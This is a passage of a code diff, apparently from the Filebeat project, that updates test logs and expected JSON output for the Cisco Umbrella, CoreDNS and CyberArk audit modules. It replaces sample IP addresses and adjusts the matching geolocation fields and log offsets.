+        "message": "\"2020-07-23 23:48:56\",\"elasticuser, someotheruser\",\"192.168.1.1\",\"89.160.20.156\",\"175.16.199.1\",\"\",\"BLOCKED\",\"https://elastic.co/blog/ext_id=Anyclip\",\"https://google.com/elastic\",\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36\",\"200\",\"850\",\"\",\"\",\"\",\"Business Services\",\"AVDetectionName\",\"Malicious\",\"MalwareName\",\"\",\"\",\"Roaming Computers\",\"\"",
         "observer.product": "Umbrella",
         "observer.type": "proxy",
         "observer.vendor": "Cisco",
         "related.ip": [
-            "1.1.1.1",
+            "175.16.199.1",
             "192.168.1.1",
-            "8.8.8.8"
+            "89.160.20.156"
         ],
         "service.type": "cisco",
         "source.address": "192.168.1.1",
         "source.ip": "192.168.1.1",
-        "source.nat.ip": "1.1.1.1",
+        "source.nat.ip": "89.160.20.156",
         "url.domain": "elastic.co",
         "url.original": "https://elastic.co/blog/ext_id=Anyclip",
         "url.path": "/blog/ext_id=Anyclip",
@@ -99,7 +99,7 @@
         "http.response.bytes": "1489",
         "http.response.status_code": "200",
         "input.type": "log",
-        "log.offset": 798,
+        "log.offset": 820,
         "message": "\"2017-10-02 23:52:53\",\"elasticuser\",\"ActiveDirectoryUserName,ADSite,Network\",\"192.192.192.135\",\"1.1.1.91\",\"\",\"ALLOWED\",\"http://google.com/the.js\",\"www.google.com\",\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36\",\"200\",\"562\",\"1489\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"Networks\"",
         "observer.product": "Umbrella",
         "observer.type": "proxy",
diff --git a/x-pack/filebeat/module/coredns/log/test/coredns-json.log-expected.json b/x-pack/filebeat/module/coredns/log/test/coredns-json.log-expected.json
index cc9284289024..9a1c8520b766 100644
--- a/x-pack/filebeat/module/coredns/log/test/coredns-json.log-expected.json
+++ b/x-pack/filebeat/module/coredns/log/test/coredns-json.log-expected.json
@@ -155,4 +155,4 @@
             "coredns"
         ]
     }
-]
+]
\ No newline at end of file
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/105_add_file_category.log b/x-pack/filebeat/module/cyberarkpas/audit/test/105_add_file_category.log
index cb662d0ec481..d36d7ec7260b 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/105_add_file_category.log
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/105_add_file_category.log
@@ -1,6 +1,6 @@
 <5>1 2021-03-08T18:24:49Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 08 10:24:49","IsoTimestamp":"2021-03-08T18:24:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"105","Desc":"Add File Category","Severity":"Info","Issuer":"Administrator","Action":"Add File Category","SourceUser":"","TargetUser":"","Safe":"Test","File":"Root\\Operating System-WinDesktopLocal-Address-adriansr","Station":"127.0.0.1","Location":"","Category":"Address","RequestId":"","Reason":"Value=[Address]","ExtraDetails":"","Message":"Add File Category","GatewayStation":"10.0.1.20"}}}
-<5>1 2021-03-10T09:11:54Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:54","IsoTimestamp":"2021-03-10T09:11:54Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"105","Desc":"Add File Category","Severity":"Info","Issuer":"PSMPApp_localhost.localdomain","Action":"Add File Category","SourceUser":"","TargetUser":"","Safe":"PSMPLiveSessions","File":"Root\\PSMPApp_localhost.localdomain.LiveSessions","Station":"81.32.170.205","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add File Category","GatewayStation":""}}}
-<5>1 2021-03-10T18:46:48Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:46:48","IsoTimestamp":"2021-03-10T18:46:48Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"105","Desc":"Add File Category","Severity":"Info","Issuer":"PSMApp_VAGRANT","Action":"Add File Category","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSMServer.LiveSessions","Station":"81.32.170.205","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add File Category","GatewayStation":""}}}
-<5>1 2021-03-10T22:17:26Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:17:26","IsoTimestamp":"2021-03-10T22:17:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"105","Desc":"Add File Category","Severity":"Info","Issuer":"Administrator","Action":"Add File Category","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\PSM-ASR-CYBERARK-WI","Station":"35.192.121.42","Location":"","Category":"LogonDomain","RequestId":"","Reason":"Value=[ASR-CYBERARK-WI]","ExtraDetails":"","Message":"Add File Category","GatewayStation":""}}}
-<5>1 2021-03-10T22:20:12Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:20:12","IsoTimestamp":"2021-03-10T22:20:12Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"105","Desc":"Add File Category","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Add File Category","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSM-ASR-CYBERARK-WI.LiveSessions","Station":"35.192.121.42","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add File Category","GatewayStation":""}}}
-<5>1 2021-03-11T16:59:58Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 08:59:58</Timestamp>\n    <IsoTimestamp>2021-03-11T16:59:58Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>105</MessageID>\n    <Desc>Add File Category</Desc>\n    <Severity>Info</Severity>\n    <Issuer>PSMPApp_VAGRANT</Issuer>\n    <Action>Add File Category</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSMPLiveSessions</Safe>\n    <File>Root\\PSMPApp_VAGRANT.LiveSessions</File>\n    <Station>81.32.170.205</Station>\n    <Location></Location>\n    <Category>_PSMLiveSessions_1</Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Add File Category</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:58","IsoTimestamp":"2021-03-11T16:59:58Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"105","Desc":"Add File Category","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Add File Category","SourceUser":"","TargetUser":"","Safe":"PSMPLiveSessions","File":"Root\\PSMPApp_VAGRANT.LiveSessions","Station":"81.32.170.205","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add File Category","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:54Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:54","IsoTimestamp":"2021-03-10T09:11:54Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"105","Desc":"Add File Category","Severity":"Info","Issuer":"PSMPApp_localhost.localdomain","Action":"Add File Category","SourceUser":"","TargetUser":"","Safe":"PSMPLiveSessions","File":"Root\\PSMPApp_localhost.localdomain.LiveSessions","Station":"67.43.156.14","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add File Category","GatewayStation":""}}}
+<5>1 2021-03-10T18:46:48Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:46:48","IsoTimestamp":"2021-03-10T18:46:48Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"105","Desc":"Add File Category","Severity":"Info","Issuer":"PSMApp_VAGRANT","Action":"Add File Category","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSMServer.LiveSessions","Station":"67.43.156.14","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add File Category","GatewayStation":""}}}
+<5>1 2021-03-10T22:17:26Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:17:26","IsoTimestamp":"2021-03-10T22:17:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"105","Desc":"Add File Category","Severity":"Info","Issuer":"Administrator","Action":"Add File Category","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\PSM-ASR-CYBERARK-WI","Station":"67.43.156.12","Location":"","Category":"LogonDomain","RequestId":"","Reason":"Value=[ASR-CYBERARK-WI]","ExtraDetails":"","Message":"Add File Category","GatewayStation":""}}}
+<5>1 2021-03-10T22:20:12Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:20:12","IsoTimestamp":"2021-03-10T22:20:12Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"105","Desc":"Add File Category","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Add File Category","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSM-ASR-CYBERARK-WI.LiveSessions","Station":"67.43.156.12","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add File Category","GatewayStation":""}}}
+<5>1 2021-03-11T16:59:58Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 08:59:58</Timestamp>\n    <IsoTimestamp>2021-03-11T16:59:58Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>105</MessageID>\n    <Desc>Add File Category</Desc>\n    <Severity>Info</Severity>\n    <Issuer>PSMPApp_VAGRANT</Issuer>\n    <Action>Add File Category</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSMPLiveSessions</Safe>\n    <File>Root\\PSMPApp_VAGRANT.LiveSessions</File>\n    <Station>67.43.156.14</Station>\n    <Location></Location>\n    <Category>_PSMLiveSessions_1</Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Add File Category</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:58","IsoTimestamp":"2021-03-11T16:59:58Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"105","Desc":"Add File Category","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Add File Category","SourceUser":"","TargetUser":"","Safe":"PSMPLiveSessions","File":"Root\\PSMPApp_VAGRANT.LiveSessions","Station":"67.43.156.14","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add File Category","GatewayStation":""}}}
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/105_add_file_category.log-expected.json b/x-pack/filebeat/module/cyberarkpas/audit/test/105_add_file_category.log-expected.json
index 9c3195e84889..1ca12e4e4ac1 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/105_add_file_category.log-expected.json
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/105_add_file_category.log-expected.json
@@ -59,7 +59,7 @@
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "PSMPLiveSessions",
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 10 01:11:54",
         "event.action": "add file category",
         "event.code": "105",
@@ -79,19 +79,16 @@
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -109,7 +106,7 @@
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "PSMLiveSessions",
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 10 10:46:48",
         "event.action": "add file category",
         "event.code": "105",
@@ -122,26 +119,23 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 1342,
+        "log.offset": 1341,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -160,7 +154,7 @@
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "PSM",
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "35.192.121.42",
+        "cyberarkpas.audit.station": "67.43.156.12",
         "cyberarkpas.audit.timestamp": "Mar 10 14:17:26",
         "event.action": "add file category",
         "event.code": "105",
@@ -173,25 +167,23 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 1983,
+        "log.offset": 1981,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "35.192.121.42"
+            "67.43.156.12"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "35.192.121.42",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 38.6583,
-        "source.geo.location.lon": -77.2481,
-        "source.geo.region_iso_code": "US-VA",
-        "source.geo.region_name": "Virginia",
-        "source.ip": "35.192.121.42",
+        "source.address": "67.43.156.12",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.12",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -209,7 +201,7 @@
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "PSMLiveSessions",
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "35.192.121.42",
+        "cyberarkpas.audit.station": "67.43.156.12",
         "cyberarkpas.audit.timestamp": "Mar 10 14:20:12",
         "event.action": "add file category",
         "event.code": "105",
@@ -222,25 +214,23 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 2624,
+        "log.offset": 2621,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "35.192.121.42"
+            "67.43.156.12"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "35.192.121.42",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 38.6583,
-        "source.geo.location.lon": -77.2481,
-        "source.geo.region_iso_code": "US-VA",
-        "source.geo.region_name": "Virginia",
-        "source.ip": "35.192.121.42",
+        "source.address": "67.43.156.12",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.12",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -255,11 +245,11 @@
         "cyberarkpas.audit.iso_timestamp": "2021-03-11T16:59:58Z",
         "cyberarkpas.audit.issuer": "PSMPApp_VAGRANT",
         "cyberarkpas.audit.message": "Add File Category",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 08:59:58</Timestamp>\n    <IsoTimestamp>2021-03-11T16:59:58Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>105</MessageID>\n    <Desc>Add File Category</Desc>\n    <Severity>Info</Severity>\n    <Issuer>PSMPApp_VAGRANT</Issuer>\n    <Action>Add File Category</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSMPLiveSessions</Safe>\n    <File>Root\\PSMPApp_VAGRANT.LiveSessions</File>\n    <Station>81.32.170.205</Station>\n    <Location></Location>\n    <Category>_PSMLiveSessions_1</Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Add File Category</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 08:59:58</Timestamp>\n    <IsoTimestamp>2021-03-11T16:59:58Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>105</MessageID>\n    <Desc>Add File Category</Desc>\n    <Severity>Info</Severity>\n    <Issuer>PSMPApp_VAGRANT</Issuer>\n    <Action>Add File Category</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSMPLiveSessions</Safe>\n    <File>Root\\PSMPApp_VAGRANT.LiveSessions</File>\n    <Station>67.43.156.14</Station>\n    <Location></Location>\n    <Category>_PSMLiveSessions_1</Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Add File Category</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "PSMPLiveSessions",
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 11 08:59:58",
         "event.action": "add file category",
         "event.code": "105",
@@ -272,26 +262,23 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 3275,
+        "log.offset": 3271,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/106_update_file_category.log b/x-pack/filebeat/module/cyberarkpas/audit/test/106_update_file_category.log
index 14adbc29da4b..2ffa4e3deea6 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/106_update_file_category.log
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/106_update_file_category.log
@@ -1,6 +1,6 @@
 <5>1 2021-03-08T18:25:52Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 08 10:25:52","IsoTimestamp":"2021-03-08T18:25:52Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"106","Desc":"Update File Category","Severity":"Info","Issuer":"Administrator","Action":"Update File Category","SourceUser":"","TargetUser":"","Safe":"Test","File":"Root\\Operating System-WinDesktopLocal-Address-adriansr","Station":"127.0.0.1","Location":"","Category":"Address","RequestId":"","Reason":"Value=[components] Old Value=[Address]","ExtraDetails":"","Message":"Update File Category","GatewayStation":"10.0.1.20"}}}
-<5>1 2021-03-10T18:46:48Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:46:48","IsoTimestamp":"2021-03-10T18:46:48Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"106","Desc":"Update File Category","Severity":"Info","Issuer":"PSMApp_VAGRANT","Action":"Update File Category","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSMServer.LiveSessions","Station":"81.32.170.205","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update File Category","GatewayStation":""}}}
-<5>1 2021-03-10T22:20:12Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:20:12","IsoTimestamp":"2021-03-10T22:20:12Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"106","Desc":"Update File Category","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Update File Category","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSM-ASR-CYBERARK-WI.LiveSessions","Station":"35.192.121.42","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update File Category","GatewayStation":""}}}
-<5>1 2021-03-11T17:38:26Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:38:26</Timestamp>\n    <IsoTimestamp>2021-03-11T17:38:26Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>106</MessageID>\n    <Desc>Update File Category</Desc>\n    <Severity>Info</Severity>\n    <Issuer>PSMPApp_VAGRANT</Issuer>\n    <Action>Update File Category</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSMRecordings</Safe>\n    <File>root\\87012dcc-8290-11eb-949e-080027efd402.session</File>\n    <Station>81.32.170.205</Station>\n    <Location></Location>\n    <Category>PSMStatus</Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Update File Category</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:26","IsoTimestamp":"2021-03-11T17:38:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"106","Desc":"Update File Category","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Update File Category","SourceUser":"","TargetUser":"","Safe":"PSMRecordings","File":"root\\87012dcc-8290-11eb-949e-080027efd402.session","Station":"81.32.170.205","Location":"","Category":"PSMStatus","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update File Category","GatewayStation":""}}}
-<5>1 2021-03-11T20:10:33Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 12:10:33</Timestamp>\n    <IsoTimestamp>2021-03-11T20:10:33Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>106</MessageID>\n    <Desc>Update File Category</Desc>\n    <Severity>Info</Severity>\n    <Issuer>PSMApp_ASR-WIN</Issuer>\n    <Action>Update File Category</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSMLiveSessions</Safe>\n    <File>Root\\PSM-ASR-CYBERARK-WI.LiveSessions</File>\n    <Station>34.66.114.180</Station>\n    <Location></Location>\n    <Category>_PSMLiveSessions_1</Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Update File Category</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 12:10:33","IsoTimestamp":"2021-03-11T20:10:33Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"106","Desc":"Update File Category","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Update File Category","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSM-ASR-CYBERARK-WI.LiveSessions","Station":"34.66.114.180","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update File Category","GatewayStation":""}}}
-<5>1 2021-03-14T13:49:38Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 06:49:38</Timestamp>\n    <IsoTimestamp>2021-03-14T13:49:38Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>106</MessageID>\n    <Desc>Update File Category</Desc>\n    <Severity>Info</Severity>\n    <Issuer>PSMPApp_SSH</Issuer>\n    <Action>Update File Category</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSMPLiveSessions</Safe>\n    <File>Root\\PSMPApp_SSH.LiveSessions</File>\n    <Station>34.71.250.247</Station>\n    <Location></Location>\n    <Category>_PSMLiveSessions_1</Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Update File Category</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:49:38","IsoTimestamp":"2021-03-14T13:49:38Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"106","Desc":"Update File Category","Severity":"Info","Issuer":"PSMPApp_SSH","Action":"Update File Category","SourceUser":"","TargetUser":"","Safe":"PSMPLiveSessions","File":"Root\\PSMPApp_SSH.LiveSessions","Station":"34.71.250.247","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update File Category","GatewayStation":""}}}
